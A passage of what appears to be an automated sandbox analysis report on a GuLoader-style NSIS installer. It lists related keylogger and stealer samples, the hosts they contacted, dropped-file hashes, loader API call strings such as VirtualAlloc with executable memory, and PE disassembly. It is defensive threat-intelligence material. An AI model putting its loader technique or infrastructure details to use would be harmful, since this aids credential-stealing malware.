                                                                  checkip.dyndns.comEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  24924_Payment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  api.telegram.orgZiraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  JrBeso.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lpg.cmdGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  smtp.zoho.euCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 185.230.214.164
                                                                  CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.214.164
                                                                  INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.212.164
                                                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.212.164
                                                                  Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.214.164
                                                                  Orden#46789_2024_Optoflux_mexico_sderlsTY.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.214.164
                                                                  reallyfreegeoip.orgEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  24924_Payment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll | RFQ.exe | malicious | FormBook, GuLoader
 | RFQ.exe | malicious | GuLoader
 | RFQ.exe | malicious | FormBook
 | RFQ.exe | malicious | Unknown
 | Document#.exe | malicious | Remcos
 | Document#.exe | malicious | Unknown
 | dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe | malicious | GuLoader, Remcos
 | dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe | malicious | GuLoader
 | vpv0eXLADR.exe | malicious | GuLoader
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):4.256564762130954
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                    MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                    SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                    SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                    SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:user32::EnumWindows(i r1 ,i 0)
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):56
                                                                                    Entropy (8bit):4.1929554228332
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sAAEVvjsd1o84n:fLV
                                                                                    MD5:AE7C0E5EC83AA79C677749769D8548CE
                                                                                    SHA1:CFA4516337AFC5CE5F786B2E78740DAC4AF5CD47
                                                                                    SHA-256:4015F44C7FA491CA2E52C797A3CD77CBA2C3AEF3584A6710B9E7C71411605008
                                                                                    SHA-512:A797354195BB5FCFEAB9C49B98C88EB4B164CC2745EE4EE73EB51892885D56259A93F4FFA667ECE905F4C1F060D451CE1F1098B14BD5DC049387D7A27678DA18
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:kernel32::ReadFile(i r5, i r1, i 48144384,*i 0, i 0)i.r3
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):52
                                                                                    Entropy (8bit):4.0914493934217315
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                    MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                    SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                    SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                    SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):74
                                                                                    Entropy (8bit):3.9637832956585757
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                    MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                    SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                    SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                    SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11264
                                                                                    Entropy (8bit):5.72460245623286
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
                                                                                    MD5:CF85183B87314359488B850F9E97A698
                                                                                    SHA1:6B6C790037EEC7EBEA4D05590359CB4473F19AEA
                                                                                    SHA-256:3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                                                                                    SHA-512:FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: Document#.exe, Detection: malicious, Browse
                                                                                    • Filename: Document#.exe, Detection: malicious, Browse
                                                                                    • Filename: dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe, Detection: malicious, Browse
                                                                                    • Filename: dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe, Detection: malicious, Browse
                                                                                    • Filename: vpv0eXLADR.exe, Detection: malicious, Browse
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.3961372137069485
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sEMBQEJkJVEjBm/MFWxQoXUn:+RWxvUn
                                                                                    MD5:210E1DB7D57A610F482EAD12F5D55546
                                                                                    SHA1:611874360D76CE3BC238EC9F335E54E422B87FA5
                                                                                    SHA-256:18186F100AD3AEE037C814D04A1F8BA01B8FD760A524FBEE988380DC2DCE250A
                                                                                    SHA-512:8900C502AA8365673EF13EEA6738358D261BD689CDB2C738AB155461167ACDF60494F1102BF9A1D81E116697FA943A6B06A3733C2FBC0B87F56814C56F6B4F00
                                                                                    Malicious:false
                                                                                    Preview:kernel32::VirtualAlloc(i 0,i 48144384, i 0x3000, i 0x40)p.r1
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):960
                                                                                    Entropy (8bit):3.331494472222597
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8wl0BRsXUjgJEIXYWd8FKEMJsW+sl38MPAE0B33laZmN1U4t2YCBTo:8l+CeYWd8FKnyG1InB3UZCiJT
                                                                                    MD5:02B3AD0BC72EFF61E281F4DBFC87ED33
                                                                                    SHA1:02DD8D792844FE5CE72D5CB1856BFE1257E96896
                                                                                    SHA-256:640E2C2FC86090DE80A73C5A585FA7ED73E264ADB0F732DB2B915CBE347AA3E8
                                                                                    SHA-512:E224E70D7B2C3807ED4459A6FE9E4640BEBC278DCBA755639392145533D60C3FF3C0CE3E63B488F54345578C7C144001D56C394FECE8DE090E3AC114769D8AF9
                                                                                    Malicious:false
                                                                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................D.y.l.a.n.e.....\.1...........Documents.D............................................D.o.c.u.m.e.n.t.s.....b.2...........skinder.mun.H............................................s.k.i.n.d.e.r...m.u.n.............\.....\.D.o.c.u.m.e.n.t.s.\.s.k.i.n.d.e.r...m.u.n.o.C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.k.o.n.f.l.i.k.t.t.i.l.s.t.a.n.d.e.n.e.s.\.p.o.l.y.a.u.t.o.g.r.a.p.h.y.\.c.r.o.t.a.l.i.d.\.U.r.g.i.n.g.............-...............#.F..l.H.i.-...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.3.................
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):477423
                                                                                    Entropy (8bit):1.2506672981439135
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WkOR7fUmO74tFrjEiHzBA0n/FHjfyzjw0W1wtw3/aU00ID:HGcyvHHzpxm40awtp
                                                                                    MD5:95377A86A6EF1A7E49728D904BFF2B04
                                                                                    SHA1:DBD60478FFD1CD3A056B57D2F57931D656081394
                                                                                    SHA-256:AD82696AB378938B13F43641D615DBEA7D09A8F532BBDCF60B91D5A0607A3B21
                                                                                    SHA-512:E0651A4801B2C199990C7954BA00D3E7890F4F2B47A14B07C29BC8DDE8CD7990FF5AB851D803864E8842438074132ABF1C559C7C5ABD6A5F0B00F6F6B56B7D7C
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):112909
                                                                                    Entropy (8bit):4.591397373758405
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oCMHd1/BH7JP0IejKdjw+v4TopG+CweDDKX+NnRFCpWYfwXcRra:g/xJ0pj+LcDDyy/YfwXcRra
                                                                                    MD5:89C45E07E092936DE73A3A8CA0842133
                                                                                    SHA1:CA94EFB89EAA96D88D5990081B0008500164CB61
                                                                                    SHA-256:77C5C49D07CCF105A686FA9BDFE14FCD558013CDD3FB5B8428B8C0A8E7B444CD
                                                                                    SHA-512:F2802A989BE14B8FC574B3FB72422A543325CD59D3EEFE38108B9CCD60E13CEB517665D5667B5965177746F1E95F3CEB86C794AC2B76A3E93711301008EF7335
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):249627
                                                                                    Entropy (8bit):1.2496968633941035
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:bpNIZEedqLV/+lQDfk647so85yNWd/22GUMUq5kQZb+N7LH7NJroTBAO/neZh07v:tNXB4IpvbHrcpT7wch7
                                                                                    MD5:E31CA15A1FA461A37BDEF089CE7C1AEB
                                                                                    SHA1:C11D4F0C0B9B7EC01405DF760BF57DD05C1320EB
                                                                                    SHA-256:C177C2438C3B76CDA1D7429835387A4025A29E0804019917A637653985D7A21D
                                                                                    SHA-512:0C1E2DCCF5B147FAFF87BC6A785F08BCAC243899F54B58BF1386E3EE8DF0B1CDEF6DC07FF4E4EA8C7D81DCAD7EB1516EF9BC216FCF5EE1DD17D20BD0733D27F4
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):227146
                                                                                    Entropy (8bit):1.2507962577643048
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:6rzdwfqNWzLNV9xQfldyXMlAW7/QmwODzSwoIOFI4Z47LZYraJuQaUv+ExLyVDbU:QgulAY/jjLKm3Se4W/RCtk
                                                                                    MD5:1B56689CE88E0D73CBC9729C939F4343
                                                                                    SHA1:6E202730B13AFC6AAD3AF416BA1DF2F9D9D61C10
                                                                                    SHA-256:BA9B41B120C3F48A1E5615BF65EC729DE135F5A73B0F2F910510E2AD10DCF03F
                                                                                    SHA-512:A0510253E13D45B1925B065E3AB35723752D4ADA9C53146B97A6D372D8C218093554D7CB16F8102A10FBAB907B392E832AC03FDA5E8E9E944FA3B8814C231CC0
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):528
                                                                                    Entropy (8bit):4.28284467655082
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Uh++iS7FwoXJSAN2NqE77aWVk7PQvnPWFlHXLZTAd:Uh7xwoXf2UEHLe7Qmz7ZTW
                                                                                    MD5:19CF575DB84A92DCE3430894128142B0
                                                                                    SHA1:0C9628D7A7ABA3D61DA337A8C2997391309CEDA8
                                                                                    SHA-256:F63EBFFB144306D1FCA9BBD00F443B60BBEB019D469BD63DD83D960ECD3DC9AA
                                                                                    SHA-512:EFFC75C60402B65F554E454C15B52A8C90D232AEF16007EE151D4EC924C486BC29B07DBD9049C0E33B3DC5A9FC49B53C58FE233ED38F3A6700475E07C04D0D06
                                                                                    Malicious:false
                                                                                    Preview:udparcelleres kardinalens apprehensions tetanical korpsene kjolesttets.tapstederne factoringselskaberne staffing uproariously angulo sterhytte aliptae intetanende cavalcaded sladdervorn pjaskfuldt sjlen..launches chowries kriminalkommissr researchful.sinologist maximillian unitarismes eftermodning unusurping decarbonize barytpapirs unjuridical etiopiernes skdebarn..radicalness brushanernes anthoecologist nedtones unfunded tass sloganizes..formodnings kommercielle relativstnings electronography husassistenters drivhusenes..
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):434486
                                                                                    Entropy (8bit):6.995272621270874
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:3kVhUPrseov2p7np9ELPZWefolMx495ZfCHgsYgy4Ar5:mPeov2tnPGZPdJHgsYgCr5
                                                                                    MD5:E7D15ADB4309C1B63FEF61602F91390D
                                                                                    SHA1:8552DD90E02579447A9FBE6A5A3FDA8BB153E3FF
                                                                                    SHA-256:5D3ACD5712116FF97CC7DC47AA2647232FBFD7869AF4A2FB9F164E6270E870F8
                                                                                    SHA-512:A6D3D47F002CF138D74516D0613836B25719954A0030907D1294AFC9C868148F0BB555F349E17AF5DD4C1CC57295C84F080F9A72EA8958384AE1714257CB57AC
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Category:dropped
                                                                                    Size (bytes):634320
                                                                                    Entropy (8bit):7.8636262102112875
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:2qkIddrO3HTLOGOlN1ruuG3DeoNjqqtRaG31TAHcF1umM:3vdxOXTL+bi/dXaGDF1umM
                                                                                    MD5:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    SHA1:D904EFBF202092B4B29862951C2B39D1C298AC1B
                                                                                    SHA-256:87DA16B9E0F9FC7D74735C59B920DEA8460D91F497380AA1A83834B86771B9E2
                                                                                    SHA-512:15ACD62254345446B20D040924C397989FF7FB3257C01DE6F998FD36A4798D696942A9E9A939158133622E4927F1F155FC5DB946C5A92C64F73F625D078774D0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9......0.......p....@...........................<..............................................s........<.............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc.........<......v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.8636262102112875
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File size:634'320 bytes
                                                                                    MD5:9ca0138738dcc4faa58c59c0898d4834
                                                                                    SHA1:d904efbf202092b4b29862951c2b39d1c298ac1b
                                                                                    SHA256:87da16b9e0f9fc7d74735c59b920dea8460d91f497380aa1a83834b86771b9e2
                                                                                    SHA512:15acd62254345446b20d040924c397989ff7fb3257c01de6f998fd36a4798d696942a9e9a939158133622e4927f1f155fc5db946c5a92c64f73f625d078774d0
                                                                                    SSDEEP:12288:2qkIddrO3HTLOGOlN1ruuG3DeoNjqqtRaG31TAHcF1umM:3vdxOXTL+bi/dXaGDF1umM
                                                                                    TLSH:28D4120BFE8D036ED39D46B239BB0278CB59CF5351906856BBC5FDAE583168DA8430D2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9....
                                                                                    Icon Hash:24ed8d96b2ade832
                                                                                    Entrypoint:0x4030ef
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x51E30576 [Sun Jul 14 20:09:26 2013 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN="Opiniater Unvolatile ", O=Skyldneren, L=Rockland St Peter, S=England, C=GB
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 31/12/2023 02:53:52 30/12/2026 02:53:52
                                                                                    Subject Chain
                                                                                    • CN="Opiniater Unvolatile ", O=Skyldneren, L=Rockland St Peter, S=England, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:3D226A56E03EFAA16289060A91F23E1C
                                                                                    Thumbprint SHA-1:405658081748E5E8A626AD0EF5A077FCBADAE86E
                                                                                    Thumbprint SHA-256:229F170A4B19E73BADFF4BE275F919526541F7A240F2EA997996B3D677B34936
                                                                                    Serial:015F1E3D2215A6DAC3895182D244853A80F08D13
                                                                                    Instruction
                                                                                    sub esp, 00000184h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409190h
                                                                                    mov dword ptr [esp+20h], ebx
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407034h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B0h]
                                                                                    push ebx
                                                                                    call dword ptr [0040728Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [007A27B8h], eax
                                                                                    call 00007F66E8A55B48h
                                                                                    mov dword ptr [007A2704h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+38h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0079DCB8h
                                                                                    call dword ptr [00407164h]
                                                                                    push 00409180h
                                                                                    push 007A1F00h
                                                                                    call 00007F66E8A557F2h
                                                                                    call dword ptr [0040711Ch]
                                                                                    mov ebp, 007A8000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F66E8A557E0h
                                                                                    push ebx
                                                                                    call dword ptr [00407114h]
                                                                                    cmp byte ptr [007A8000h], 00000022h
                                                                                    mov dword ptr [007A2700h], eax
                                                                                    mov eax, ebp
                                                                                    jne 00007F66E8A52DDCh
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 007A8001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007F66E8A5528Dh
                                                                                    push eax
                                                                                    call dword ptr [00407220h]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F66E8A52E95h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007F66E8A52DD8h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007F66E8A52DCCh
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c0000         0xdbd8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x99ae8          0x12e8        .data
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x298         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5bc8 | 0x5c00 | 0dfea16d5f7d29b49617c6d476811b8f | False | 0.6820652173913043 | data | 6.509979623096964 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x11ce | 0x1200 | 6c31e0693072284f258d2c4a271de506 | False | 0.4524739583333333 | OpenPGP Secret Key | 5.236327486414569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
